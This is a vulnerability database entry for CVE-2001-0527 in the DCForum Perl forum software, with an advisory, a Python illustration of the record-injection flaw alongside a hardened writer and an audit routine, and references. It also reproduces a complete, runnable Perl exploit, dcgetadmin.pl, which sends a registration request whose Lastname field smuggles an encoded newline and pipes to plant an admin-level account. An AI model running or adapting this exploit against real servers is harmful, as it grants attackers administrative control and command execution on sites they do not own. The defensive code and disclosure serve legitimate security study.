DCForum Remote Administrative Privilege Vulnerability

Vulnerability ID: 1106340    Vulnerability type: Input validation
Published: 2001-05-08    Updated: 2005-05-02
CVE ID: CVE-2001-0527    CNNVD ID: CNNVD-200108-061
Platform: CGI    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20849
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-061
|Vulnerability details
DCForum is a web-based conferencing system designed for online discussion. It is written in Perl, has almost no system dependencies, and runs on Linux, Windows and most Unix variants. Some versions of DCForum contain a vulnerability that lets a remote attacker obtain DCForum administrative privileges and even execute arbitrary commands. DCForum maintains a file of user account information, including hashes of user passwords and other sensitive data. When a new account is created, the user's information is written to this file, one user per line, with the fields of each record separated by the pipe character ('|'). DCForum does not validate user input strictly enough: an attacker who places a URL-encoded pipe and newline at the end of the last field of the user information can append arbitrary additional users to the user information file, and can assign them administrative privileges. An account with DCForum administrative privileges may be able to execute arbitrary commands with the privileges of the web server.
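The injection described above comes down to one missing check: a delimiter character inside a user-supplied field lets the attacker close the current record and start a new one. The following Python (an added illustration for this page, written in Python rather than DCForum's Perl, and not DCForum's own code) shows the unsafe writer beside a hardened one and an audit routine a defender could run over an existing user file. The record layout hash|username|level|firstname|lastname|email, the query string and the HASH(...) placeholder are constructed for the demonstration and are not DCForum's real format or hashing.

```python
"""Record-injection flaw of the kind described for DCForum (CVE-2001-0527):
unsafe writer, hardened writer and an audit over the resulting user file.
Added example; the field layout below is an assumption, not DCForum's."""
from urllib.parse import parse_qs

# Assumed layout of one line in the user file (not DCForum's real layout).
FIELDS = ["hash", "username", "level", "firstname", "lastname", "email"]
FIELD_SEP = "|"
RECORD_SEP = "\n"

# Constructed registration query shaped like the one in the advisory:
# %0a is a newline and %7c a pipe, hidden at the end of the Lastname value.
CONSTRUCTED_QUERY = (
    "Username=not123&Password=secret&Firstname=Proof"
    "&Lastname=Concept%0aHASHVALUE%7cevilhacker456%7cadmin%7cProof%7cConcept"
    "&EMail=nothere%40nomail.com"
)


class BadFieldError(ValueError):
    """Raised when a submitted value could act as a record/field delimiter."""


def registration_from_query(query: str) -> dict:
    """Decode the CGI query into the values a registration handler would store."""
    q = {k: v[0] for k, v in parse_qs(query).items()}
    return {
        "hash": "HASH(" + q["Password"] + ")",  # placeholder, not a real crypt()
        "username": q["Username"],
        "level": "user",                        # what the server intends to store
        "firstname": q["Firstname"],
        "lastname": q["Lastname"],
        "email": q["EMail"],
    }


def vulnerable_append(store: str, values: dict) -> str:
    """Write the record as the text describes: no check for delimiters in values."""
    line = FIELD_SEP.join(values[f] for f in FIELDS)
    return store + line + RECORD_SEP


def safe_append(store: str, values: dict) -> str:
    """Hardened writer: reject any value containing a delimiter character,
    and never let client-supplied data decide the privilege level."""
    for name in FIELDS:
        if any(ch in values[name] for ch in (FIELD_SEP, "\r", "\n")):
            raise BadFieldError(f"{name} contains a delimiter character")
    fixed = dict(values, level="user")  # privilege level is server-assigned
    line = FIELD_SEP.join(fixed[f] for f in FIELDS)
    return store + line + RECORD_SEP


def parse_records(store: str) -> list:
    """Split the user file into records, then each record into fields."""
    return [line.split(FIELD_SEP) for line in store.split(RECORD_SEP) if line]


def audit(store: str) -> tuple:
    """Return (records with the wrong field count, usernames at admin level).
    Both lists deserve review after an incident of this kind."""
    malformed, admins = [], []
    for rec in parse_records(store):
        if len(rec) != len(FIELDS):
            malformed.append(rec)
        elif rec[FIELDS.index("level")] == "admin":
            admins.append(rec[FIELDS.index("username")])
    return malformed, admins


if __name__ == "__main__":
    values = registration_from_query(CONSTRUCTED_QUERY)
    print("unsafe writer produced:\n" + vulnerable_append("", values))
    print("audit:", audit(vulnerable_append("", values)))
    try:
        safe_append("", values)
    except BadFieldError as exc:
        print("hardened writer rejected the request:", exc)
```

Running the audit over the file produced by the unsafe writer shows a point worth noting for detection: the injected line has the right number of fields and looks well-formed, while it is the legitimate record (truncated at the injected newline) that fails the field-count check. A field-count check alone therefore misses the attacker's account; reviewing every admin-level record, and storing a server-assigned level rather than anything derived from the form, is what closes the gap.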
|Vulnerability exploit (EXP)
#source: http://www.securityfocus.com/bid/2728/info
#
#DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.
#
#DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.
#
#When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.
#
#DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.
#
#This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 
#

#!/usr/bin/perl

# dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com
#
# Registers a throw-away account whose Lastname value carries an encoded
# newline and pipe characters, so that dcboard.cgi writes a second,
# admin-level record into its user file (see the description above).

use Getopt::Std;
use IO::Socket;

getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri  = $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

# Random names and passwords so repeated runs do not collide with existing accounts.
$username = 'evilhacker' . (int rand(9899) + 100);
$password = int rand(9899) + 100;
# DCForum stores crypt() hashes on Unix; -p stores the password as plaintext (NT).
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . (int rand(9899) + 100);
$dummypass = int rand(9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass = $dummypass)\n";
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";

# The registration request. %0a is a newline and %7c a pipe: everything after
# Concept%0a in the Lastname value becomes a new record in the user file.
$req  = "GET $uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass";
$req .= "&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

# Print the text of the response body with HTML tags stripped,
# stopping at the first form or at the end of the body.
while (<$sock>)
{
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  s/<.+?>//g;
  print $_ unless (/^\s*$/);
}
print "\nNote: Even if your password is supposed to be e-mailed to you, it should work right away.\n";


sub usage
{
  print <<EOF;
dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin\@qDefense.com

Usage: $0 [options] host [path to dcboard.cgi]

Options:
  -a to activate the account (for sites that do not activate automatically)
     NOTE: This option is not yet supported, but should be quite easy to add if you need it

  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

EOF
  exit 1;
}
|References

Source: XF
Name: dcforum-cgi-admin-access (6538)
Link: http://xforce.iss.net/static/6538.php
Source: www.dcscripts.com
Link: http://www.dcscripts.com/dcforum/dcfNews/167.html
Source: BUGTRAQ
Name: 20010515 DCForum Password File Manipulation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-05/0122.html
Source: BID
Name: 2728
Link: http://www.securityfocus.com/bid/2728
Source: OSVDB
Name: 480
Link: http://www.osvdb.org/480